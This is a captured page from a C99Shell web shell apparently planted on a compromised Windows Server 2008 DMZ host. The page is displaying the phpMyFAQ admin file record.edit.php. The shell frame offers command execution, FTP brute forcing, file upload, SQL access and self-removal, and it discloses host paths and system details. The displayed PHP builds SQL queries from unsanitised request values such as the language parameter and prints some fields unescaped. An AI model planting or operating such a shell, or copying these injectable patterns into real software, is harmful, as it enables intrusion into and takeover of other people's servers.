!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\AmbienteBogota\aulavirtual\admin\   drwxrwxrwx
Free 4.08 GB of 39.52 GB (10.32%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     record.edit.php (15.67 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
* $Id: record.edit.php,v 1.19.2.14.2.20 2007/03/30 07:31:48 thorstenr Exp $
*
* @author       Thorsten Rinne <thorsten@phpmyfaq.de>
* @since        2003-02-23
* @license      Mozilla Public License 1.1
* @copyright    (c) 2001-2006 phpMyFAQ Team
*
* The contents of this file are subject to the Mozilla Public License
* Version 1.1 (the "License"); you may not use this file except in
* compliance with the License. You may obtain a copy of the License at
* http://www.mozilla.org/MPL/
*
* Software distributed under the License is distributed on an "AS IS"
* basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
* License for the specific language governing rights and limitations
* under the License.
*/

if (!defined('IS_VALID_PHPMYFAQ_ADMIN')) {
    
header('Location: http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']));
    exit();
}

if (
$permission["editbt"] && !emptyTable(SQLPREFIX."faqcategories")) {
    
$tree = new Category($LANGCODE);
    
$tree->buildTree();
    
$rubrik '';
    
$thema '';
    
$categories = array('category_id''category_lang');

    if (isset(
$_REQUEST["aktion"]) && $_REQUEST["aktion"] == "takequestion") {

        
$id_question intval$_REQUEST['id']);
        
$query_questions sprintf('SELECT ask_rubrik, ask_content FROM %sfaqfragen WHERE id = %d'SQLPREFIX$id_question);
        
$result_questions $db->query($query_questions);
        
$row $db->fetch_object($result_questions);
        
$rubrik $row->ask_rubrik;
        
$thema $row->ask_content;
        
$lang $LANGCODE;
        
$categories = array(array('category_id' => $rubrik'category_lang' => $lang));
    }

    if (isset(
$_REQUEST["aktion"]) && $_REQUEST["aktion"] == "editpreview") {

        if (isset(
$_REQUEST["id"]) && $_REQUEST["id"] != "") {
            
$id $_REQUEST["id"];
            
$acti "saveentry&amp;id=".$id;
        } else {
            
$id 0;
            
$acti "insertentry";
        }
        
$lang $_REQUEST["lang"];
        
$rubrik = isset($_POST['rubrik']) ? $_POST['rubrik'] : null;
        if (
is_array($rubrik)) {
            foreach (
$rubrik as $cats) {
                
$categories[] = array('category_id' => $cats'category_lang' => $lang);
            }
        }
        
$active $_REQUEST["active"];
        
$keywords $_REQUEST["keywords"];
        
$thema $_REQUEST["thema"];
        
$content htmlspecialchars($_REQUEST["content"]);
        
$author $_REQUEST["author"];
        
$email $_REQUEST["email"];
        
$comment $_REQUEST["comment"];
        
$changed $_REQUEST["changed"];
        
$solution_id $_REQUEST['solution_id'];
        
$revision_id = isset($_REQUEST['revision_id']) ? $_REQUEST['revision_id'] : 0;

    } elseif (isset(
$_REQUEST["aktion"]) && $_REQUEST["aktion"] == "editentry") {

        if ((!isset(
$rubrik) && !isset($thema)) || (isset($_REQUEST["id"]) && $_REQUEST["id"] != "")) {
            
adminlog("Beitragedit, ".$_REQUEST["id"]);
            
$id intval($_GET["id"]);
            
$lang $_GET["lang"];

            
// Get the category
            
$resultCategory $db->query('SELECT category_id, category_lang FROM '.SQLPREFIX.'faqcategoryrelations WHERE record_id = '.$id.' AND record_lang = \''.$lang.'\'');
            while (
$row $db->fetch_object($resultCategory)) {
                
$categories[] = array('category_id' => $row->category_id'category_lang' => $row->category_lang);
            }

            
// Get the record
            
$resultRecord $db->query('SELECT '.SQLPREFIX.'faqdata.id AS id, '.SQLPREFIX.'faqdata.lang AS lang, '.SQLPREFIX.'faqdata.solution_id AS solution_id, '.SQLPREFIX.'faqdata.revision_id AS revision_id, '.SQLPREFIX.'faqdata.active AS active, '.SQLPREFIX.'faqdata.keywords AS keywords, '.SQLPREFIX.'faqdata.thema AS thema, '.SQLPREFIX.'faqdata.content AS content, '.SQLPREFIX.'faqdata.author AS author, '.SQLPREFIX.'faqdata.email AS email, '.SQLPREFIX.'faqdata.comment AS comment, '.SQLPREFIX.'faqdata.datum AS datum FROM '.SQLPREFIX.'faqdata WHERE id = '.$id.' AND lang = \''.$lang.'\'');

            
$row $db->fetch_object($resultRecord);
            
$id $row->id;
            
$lang $row->lang;
            
$solution_id $row->solution_id;
            
$revision_id $row->revision_id;
            
$active $row->active;
            
$keywords $row->keywords;
            
$thema $row->thema;
            
$content htmlspecialchars($row->content);
            
$author $row->author;
            
$email $row->email;
            
$comment $row->comment;
            
$date $row->datum;
            
$acti 'saveentry&amp;id='.$_REQUEST['id'];
        } else {
            
$acti 'insertentry';
            
$id 0;
            
$lang $LANGCODE;
            
$revision_id 0// Default start value for revisions
        
}

    } else {

        
adminlog('Beitragcreate');
        
$acti 'insertentry';
        if (!
is_array($categories)) {
            
$categories = array();
        }
        
$id 0;
        
$lang $LANGCODE;
        
$revision_id 0// Default start value for revisions
    
}

    
// Revisions
    
if (isset($_REQUEST['revisionid_selected'])){
        
$revisionid_selected $_REQUEST['revisionid_selected'];
    } elseif (isset(
$revision_id)) {
        
$revisionid_selected $revision_id;
    }

    print 
'<h2>'.$PMF_LANG["ad_entry_edit_1"];
    if (
!= $id) {
        print 
' <span style="color: Red;">'.$id.' ('.$PMF_LANG['ad_entry_revision'].' 1.'.$revisionid_selected.') </span> ';
    }
    print 
' '.$PMF_LANG["ad_entry_edit_2"].'</h2>';

    if (
$permission["changebtrevs"]){
        
$query sprintf("SELECT revision_id, datum, author FROM %sfaqdata_revisions WHERE id = %d ORDER BY revision_id"SQLPREFIX$id);
        
$result2 $db->query($query);
        if (
$db->num_rows($result2) > 0) {
?>
    <form id="selectRevision" name="selectRevision" action="<?php print $_SERVER["PHP_SELF"].$linkext?>&amp;aktion=editentry&amp;id=<?php print $id?>&amp;lang=<?php print $lang?>" method="post" />
    <fieldset>
    <legend><?php print $PMF_LANG['ad_changerev']; ?></legend>
        <select name="revisionid_selected" onChange="selectRevision.submit();" />
            <option value="<?php print $revision_id?>"><?php print $PMF_LANG['ad_changerev']; ?></option>
<?php
            
while ($row2 $db->fetch_object($result2)){
?>
            <option value="<?php print $row2->revision_id?><?php if ($revisionid_selected == $row2->revision_id) { print 'selected="selected"'; } ?> ><?php print $PMF_LANG['ad_entry_revision'].' 1.'.$row2->revision_id.': '.makeDate($row2->datum)." - ".$row2->author?></option>
<?php
            
}
?>
        </select>
    </fieldset>
    </form>
    <br />
<?php
        
}

        if (isset(
$revisionid_selected) && isset($revision_id) && $revisionid_selected != $revision_id) {

            
$result2 $db->query("SELECT id, lang, solution_id, revision_id, active, keywords, thema, content, comment, datum, author, email FROM ".SQLPREFIX."faqdata_revisions WHERE id = ".$id." AND lang = '".$lang."' AND revision_id = ".$revisionid_selected);
            
$row $db->fetch_object($result2);
            
$id $row->id;
            
$lang $row->lang;
            
$solution_id $row->solution_id;
            
$revision_id $row->revision_id;
            
$active $row->active;
            
$keywords $row->keywords;
            
$thema $row->thema;
            
$content htmlspecialchars($row->content);
            
$author $row->author;
            
$email $row->email;
            
$comment $row->comment;
            
$date $row->datum;

        }
    }

?>

    <form style="float: left;" action="<?php print $_SERVER["PHP_SELF"].$linkext?>&amp;aktion=<?php print $acti?>" method="post">
    <input type="hidden" name="revision_id" id="revision_id" value="<?php print $revision_id?>" />

    <fieldset>
    <legend><?php print $PMF_LANG['ad_entry_faq_record']; ?></legend>

    <label class="lefteditor" for="rubrik"><?php print $PMF_LANG["ad_entry_category"]; ?></label>
    <select name="rubrik[]" id="rubrik" size="5" multiple="multiple">
<?php print $tree->printCategoryOptions($categories); ?>
    </select><br />

    <label class="lefteditor" for="thema"><?php print $PMF_LANG["ad_entry_theme"]; ?></label>
    <textarea name="thema" id="thema" style="width: 390px; height: 50px;" cols="2" rows="50"><?php if (isset($thema)) { print $thema; } ?></textarea><br />

    <label for="content"><?php print $PMF_LANG["ad_entry_content"]; ?></label>
    <noscript>Please enable JavaScript to use the WYSIWYG editor!</noscript><textarea id="content" name="content" cols="50" rows="10"><?php if (isset($content)) { print trim($content); } ?></textarea><br />

<?php
    
if ($permission["addatt"]) {
?>
    <label><?php print $PMF_LANG["ad_att_att"]; ?></label>
<?php
        
if (isset($id) && $id != "") {
?>
        <strong><?php print "../attachments/".$id."/" ?></strong><br />
<?php
            
if (@is_dir(PMF_ROOT_DIR."/attachments/".$id."/")) {
                
$do dir(PMF_ROOT_DIR."/attachments/".$id."/");
                while (
$dat $do->read()) {
                    if (
$dat != "." && $dat != "..") {
                        print 
"<a href=\""."../attachments/".$id."/".rawurlencode($dat)."\">".$dat."</a>";
                        if (
$permission["delatt"]) {
                            print 
"&nbsp;[&nbsp;<a href=\"".$_SERVER["PHP_SELF"].$linkext."&amp;aktion=delatt&amp;id=".$id."&amp;which=".rawurlencode($dat)."&amp;lang=".$lang."\">".$PMF_LANG["ad_att_del"]."</a>&nbsp;]";
                        }
                        print 
"<br />\n";
                    }
                }
            } else {
                print 
"<br />\n";
                print 
"<em>".$PMF_LANG["ad_att_none"]."</em> ";
            }
            print 
"<a href=\"#\" onclick=\"Picture('attachment.php?uin=".$uin."&amp;id=".$id."&amp;rubrik=".$rubrik."', 'Attachment', 400,80)\">".$PMF_LANG["ad_att_add"]."</a>";
        } else {
            print 
"&nbsp;".$PMF_LANG["ad_att_nope"];
        }
?><br />

<?php
    
}
?>

    <label class="lefteditor" for="keywords"><?php print $PMF_LANG["ad_entry_keywords"]; ?></label>
    <input name="keywords" id="keywords" style="width: 390px;" value="<?php if (isset($keywords)) { print htmlspecialchars($keywords); } ?>" /><br />

    <label class="lefteditor" for="author"><?php print $PMF_LANG["ad_entry_author"]; ?></label>
    <input name="author" id="author" style="width: 390px;" value="<?php if (isset($author)) { print htmlspecialchars($author); } else { print $auth_realname; } ?>" /><br />

    <label class="lefteditor" for="email"><?php print $PMF_LANG["ad_entry_email"]; ?></label>
    <input name="email" id="email" style="width: 390px;" value="<?php if (isset($email)) { print htmlspecialchars($email); } else { print $auth_email; } ?>" /><br />

    </fieldset>

    <fieldset>
    <legend><?php print $PMF_LANG['ad_entry_record_administration']; ?></legend>

    <label class="left" for="language"><?php print $PMF_LANG["ad_entry_locale"]; ?>:</label>
    <?php print selectLanguages($lang); ?><br />

    <label class="left" for="solution_id"><?php print $PMF_LANG['ad_entry_solution_id']; ?>:</label>
    <input name="solution_id" id="solution_id" style="width: 50px; text-align: right;" value="<?php print (isset($solution_id) ? $solution_id getSolutionId()); ?>" size="5" readonly="readonly" /><br />

<?php
    
if (isset($active) && $active == 'yes') {
        
$suf ' checked="checked"';
        unset(
$sul);
    } else {
        unset(
$suf);
        
$sul ' checked="checked"';
    }
?>
    <label class="left" for="active"><?php print $PMF_LANG["ad_entry_active"]; ?></label>
    <input type="radio" name="active" class="active" value="yes"<?php if (isset($suf)) { print $suf; } ?> /> <?php print $PMF_LANG["ad_gen_yes"]; ?> <input type="radio" name="active" class="active" value="no"<?php if (isset($sul)) { print $sul; } ?> /> <?php print $PMF_LANG["ad_gen_no"]; ?><br />

    <label class="left" for="comment"><?php print $PMF_LANG["ad_entry_allowComments"]; ?></label>
    <input type="checkbox" name="comment" id="comment" value="y"<?php if (isset($comment) && $comment == "y") { print " checked"; } ?> /> <?php print $PMF_LANG["ad_gen_yes"]; ?><br />
<?php
    
if ($acti != 'insertentry') {
        
$rev_yes ' checked="checked"';
        unset(
$rev_no);
    }
    if (isset(
$active) && $active == 'no') {
        
$rev_no ' checked="checked"';
        unset(
$rev_yes);
    }
    if (
$acti != 'insertentry') {
?>
    <label class="left" for="revision"><?php print $PMF_LANG['ad_entry_new_revision']; ?></label>
    <input type="radio" name="revision" class="active" value="yes"<?php print isset($rev_yes) ? $rev_yes ''?>/> <?php print $PMF_LANG["ad_gen_yes"]; ?> <input type="radio" name="revision" class="active" value="no"<?php print isset($rev_no) ? $rev_no ''?>/> <?php print $PMF_LANG["ad_gen_no"]; ?><br />
<?php
    
}
?>

    </fieldset>

    <fieldset>
    <legend><?php print $PMF_LANG['ad_entry_changelog']; ?></legend>

    <label class="lefteditor"><?php print $PMF_LANG["ad_entry_date"]; ?></label>
    <?php if (isset($date)) { print makeDate($date); } else { print makeDate(date("YmdHis")); } ?><br />

    <label class="lefteditor" for="changed"><?php print $PMF_LANG["ad_entry_changed"]; ?></label>
    <textarea name="changed" id="changed" style="width: 390px; height: 50px;" cols="40" rows="4"><?php if (isset($changed)) { print $changed; } ?></textarea><br />

    </fieldset><br />

<?php
    
if ($revisionid_selected == $revision_id) {
?>
    <input class="submit" type="submit" value="<?php print $PMF_LANG["ad_entry_save"]; ?>" name="submit[1]" />
    <input class="submit" type="submit" value="<?php print $PMF_LANG["ad_entry_preview"]; ?>" name="submit[2]" />
    <input class="submit" type="reset" value="<?php print $PMF_LANG["ad_gen_reset"]; ?>" />
<?php
    
}
    if (
$acti != "insertentry") {
?>
    <input class="submit" type="submit" value="<?php print $PMF_LANG["ad_entry_delete"]; ?>" name="submit[0]" />
<?php
    
}
?>
<br />
<?php
    
if (is_numeric($id)) {

        
$_user = array(=> 'n/a');
        
$_result $db->query("SELECT id, name FROM ".SQLPREFIX."faquser");
        while (
$row $db->fetch_object($_result)) {
            
$_user[$row->id] = $row->name;
        }
?>
    <h3><?php print $PMF_LANG["ad_entry_changelog"]; ?></h3>
<?php
        $result 
$db->query("SELECT revision_id, usr, datum, what FROM ".SQLPREFIX."faqchanges WHERE beitrag = ".$id." ORDER BY id DESC");
        while (
$row $db->fetch_object($result)) {
?>
    <div style="font-size: 10px;"><strong><?php print date("Y-m-d H:i:s"$row->datum).": ".$_user[$row->usr]; ?></strong><br /><?php print PMF_htmlentities($row->whatENT_QUOTES$PMF_LANG['metaCharset']); ?><br /><?php print $PMF_LANG['ad_entry_revision'].' 1.'.$row->revision_id?></div>
<?php
        
}
?>
    </form>
<?php
    $result 
$db->query("SELECT id, id_comment, usr, email, comment, datum FROM ".SQLPREFIX."faqcomments WHERE id = ".$id." ORDER BY datum DESC");
        if (
$db->num_rows($result) > 0) {
?>
    <p><strong><?php print $PMF_LANG["ad_entry_comment"?></strong></p>
<?php
            
while ($row $db->fetch_object($result)) {
?>
    <p><?php print $PMF_LANG["ad_entry_commentby"?> <a href="mailto:<?php print $row->email?>"><?php print $row->usr?></a>:<br /><?php print $row->comment?><br /><a href="<?php print $_SERVER["PHP_SELF"].$linkext?>&amp;aktion=delcomment&amp;artid=<?php print $row->id?>&amp;cmtid=<?php print $row->id_comment?>&amp;lang=<?php print $lang?>"><img src="images/delete.gif" alt="<?php print $PMF_LANG["ad_entry_delete"?>" title="<?php print $PMF_LANG["ad_entry_delete"?>" border="0" width="17" height="18" align="right" /></a></p>
<?php
            
}
        }
    }
} elseif (
$permission["editbt"] != && !emptyTable(SQLPREFIX."faqcategories")) {
    print 
$PMF_LANG["err_NotAuth"];
} elseif (
$permission["editbt"] && emptyTable(SQLPREFIX."faqcategories")) {
    print 
$PMF_LANG["no_cats"];
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--